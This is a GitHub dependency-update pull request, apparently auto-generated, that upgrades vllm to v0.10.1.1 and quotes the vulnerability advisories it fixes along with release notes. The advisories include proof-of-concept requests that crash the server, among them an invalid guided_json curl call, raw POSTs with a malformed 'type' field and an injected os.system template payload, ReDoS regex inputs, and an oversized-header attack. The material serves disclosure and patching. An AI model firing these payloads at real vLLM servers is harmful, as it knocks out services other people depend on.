Update dependency vllm to v0.10.1.1 [SECURITY] #8
+1
−1
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
==0.8.5
->==0.10.1.1
GitHub Vulnerability Alerts
CVE-2025-48887
Summary
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file
vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py
of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.Details
The following regular expression is used to match tool/function call patterns:
This pattern contains multiple nested quantifiers (
*
,+
), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.Attack Example:
A malicious input such as
can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).
Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.
Impact
Fix
GHSA-j828-28rj-hfhp
Summary
A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.
1. vllm/lora/utils.py Line 173
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:
r"\((.*?)\)\$?$"
matches content inside parentheses. If input such as((((a|)+)+)+)
is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability..*?
(non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.Remediation Suggestions:
2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52
Risk Description:
r'functools\[(.*?)\]'
uses.*?
to match content inside brackets, together withre.DOTALL
. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.Remediation Suggestions:
model_output
.re.finditer()
and enforce a length constraint on each match.3. vllm/entrypoints/openai/serving_chat.py Line 351
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351
Risk Description:
r'.*"parameters":\s*(.*)'
can trigger backtracking ifcurrent_text
is very long and contains repeated structures..*
matching any content is high risk.Remediation Suggestions:
current_text
length..*
to capture large blocks of text; prefer structured parsing when possible.4. benchmarks/benchmark_serving_structured_output.py Line 650
https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650
Risk Description:
r'\{.*\}'
is used to extract JSON inside curly braces. If theactual
string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.Remediation Suggestions:
actual
.{
and}
or use a robust JSON extraction tool.Fix
CVE-2025-46570
This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.
Description
When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.
For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.
Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.
Environment
Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.
Leakage
We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.

Results
In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:
Fixes
CVE-2025-46722
Summary
In the file
vllm/multimodal/hasher.py
, theMultiModalHasher
class has a security and data integrity issue in its image hashing method. Currently, it serializesPIL.Image.Image
objects using onlyobj.tobytes()
, which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.Details
vllm/multimodal/hasher.py
MultiModalHasher.serialize_item
https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
Image.Image
instances, onlyobj.tobytes()
is used for hashing.obj.tobytes()
does not include the image’s width, height, or mode metadata.Recommendation
In the
serialize_item
method, serialization ofImage.Image
objects should include not only pixel data, but also all critical metadata—such as dimensions (size
), color mode (mode
), format, and especially theinfo
dictionary. Theinfo
dictionary is particularly important in palette-based images (e.g., mode'P'
), where the palette itself is stored ininfo
. Ignoringinfo
can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (
size
,mode
,format
,info
) in the hash calculation to prevent collisions, especially in cases like palette-based images.Impact for other modalities
For the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well.
For audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue.
Fixes
CVE-2025-48942
Summary
Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server
Details
The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke a Uncaught exceptions from xgrammer in
./lib64/python3.11/site-packages/xgrammar/compiler.py
Issue with more information: https://github.com/vllm-project/vllm/issues/17248
PoC
Make a call to vllm with invalid json_scema e.g.
{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}
curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
Impact
vllm crashes
example traceback
Fix
CVE-2025-48943
Impact
A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.
Issue with more details: https://github.com/vllm-project/vllm/issues/17313
Patches
CVE-2025-48944
Summary
The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.
Details
The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:
RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"
The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.
For example, the following inputs will crash the worker:
Unclosed {, [, or (
Closed:{} and []
Here are some of runtime errors on the crash depending on what gets injected:
RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.
PoC
Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}
Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive
{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}
Impact
Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests.
Fix
CVE-2025-48956
Summary
A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user.
Details
The vulnerability leverages the abuse of HTTP headers. By setting a header such as
X-Forwarded-For
to a very large value like("A" * 5_800_000_000)
, the server's HTTP parser or application logic may attempt to load the entire request into memory, overwhelming system resources.Impact
What kind of vulnerability is it? Who is impacted?
Type of vulnerability: Denial of Service (DoS)
Resolution
Upgrade to a version of vLLM that includes appropriate HTTP limits by deafult, or use a proxy in front of vLLM which provides protection against this issue.
Release Notes
vllm-project/vllm (vllm)
v0.10.1.1
Compare Source
This is a critical bugfix and security release:
Fix CUTLASS MLA Full CUDAGraph (#23200)
Limit HTTP header count and size (#23267): GHSA-rxc4-3w6r-4v47
Do not use eval() to convert unknown types (#23266): GHSA-79j6-g2m3-jgfw
Full Changelog: vllm-project/vllm@v0.10.1...v0.10.1.1
v0.10.1
Compare Source
Highlights
v0.10.1 release includes 727 commits, 245 committers (105 new contributors).
Model Support
Engine Core
Hardware & Performance
reshape_and_cache_flash
CUDA kernel (#22036), CPU transfer support in NixlConnector (#18293).Quantization
API & Frontend
Dependencies
pip install vllm[flashinfer]
for flexible installation (#21959).V0 Deprecation
Important: As part of the ongoing V0 engine cleanup, several breaking changes have been introduced:
--task
with--runner
and--convert
options (#21470), deprecated--disable-log-requests
in favor of--enable-log-requests
for clearer semantics (#21739), renamed--expand-tools-even-if-tool-choice-none
to--exclude-tools-when-tool-choice-none
for consistency (#20544).What's Changed
SpecializedManager
by @zhouwfang in https://github.com/vllm-project/vllm/pull/21407--expand-tools-even-if-tool-choice-none
with--exclude-tools-when-tool-choice-none
for v0.10.0 by @okdshin in https://github.com/vllm-project/vllm/pull/20544flashinfer
tov0.2.8
by @cjackal in https://github.com/vllm-project/vllm/pull/21385cutlass_fp4_group_mm
illegal memory access by @yewentao256 in https://github.com/vllm-project/vllm/pull/21465run-batch
supports V1 by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/21541site_url
for RunLLM by @hmellor in https://github.com/vllm-project/vllm/pull/21564requirements/common.txt
to run unit tests by @zhouwfang in https://github.com/vllm-project/vllm/pull/21572Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.